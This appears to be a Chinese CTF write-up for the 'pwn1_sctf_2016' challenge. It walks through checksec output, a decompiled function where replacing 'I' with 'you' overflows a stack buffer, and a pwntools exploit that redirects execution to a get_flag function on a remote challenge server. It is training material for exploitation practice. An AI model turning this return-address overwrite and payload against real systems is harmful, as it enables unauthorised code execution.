加载头像

pwn1_sctf_2016

Ubuntu 16


0x01


checksec

1
2
3
4
5
6
[*] '/home/zelas/Desktop/pwn/pwn1_sctf_2016/pwn1_sctf_2016'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled //栈不可执行
PIE: No PIE (0x8048000)
1
2
$ file pwn1_sctf_2016     
pwn1_sctf_2016: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=4b1df4d30f1d6b75666c64bed078473a4ad8e799, not stripped

IDA

vuln()函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
int vuln()
{
const char *v0; // eax
char s[32]; // [esp+1Ch] [ebp-3Ch] BYREF
char v3[4]; // [esp+3Ch] [ebp-1Ch] BYREF
char v4[7]; // [esp+40h] [ebp-18h] BYREF
char v5; // [esp+47h] [ebp-11h] BYREF
char v6[7]; // [esp+48h] [ebp-10h] BYREF
char v7[5]; // [esp+4Fh] [ebp-9h] BYREF

printf("Tell me something about yourself: ");
fgets(s, 32, edata); //此处限制长度为32,s在栈中的长度为3C H
std::string::operator=(&input, s);
std::allocator<char>::allocator(&v5);
std::string::string(v4, "you", &v5);
std::allocator<char>::allocator(v7);
std::string::string(v6, "I", v7);
replace((std::string *)v3);
std::string::operator=(&input, v3, v6, v4);
std::string::~string(v3);
std::string::~string(v6);
std::allocator<char>::~allocator(v7);
std::string::~string(v4);
std::allocator<char>::~allocator(&v5);
v0 = (const char *)std::string::c_str((std::string *)&input);
strcpy(s, v0); //strcpy()v0覆盖s
return printf("So, %s\n", s); //在此处利用printf()溢出
}
//I会被置换成you

可疑函数get_flag

1
2
3
4
5
int get_flag()
{
return system("cat flag.txt");
}
//0x8048F0D

0x02


思路

1.利用[I = you ]构造3C H覆盖s

2.栈溢出ret = get_flag

s 3CH
rbp 0x4
ret get_flag 0x8048F0D

0x03


exp

1
2
3
4
5
6
7
8
9
10
11
12
13
from pwn import *

# io = process(['pwn1_sctf_2016'])
io = remote('node4.buuoj.cn', 27019)

get_flag = 0x8048F0D
padding = 20

payload = b'I' * padding + b'a' * 0x4 + p64(get_flag)

io.sendline(payload)
io.interactive()


评论
✅ 你无需删除空行,直接评论以获取最佳展示效果
引用到评论
随便逛逛博客分类文章标签
复制地址关闭热评深色模式轉為繁體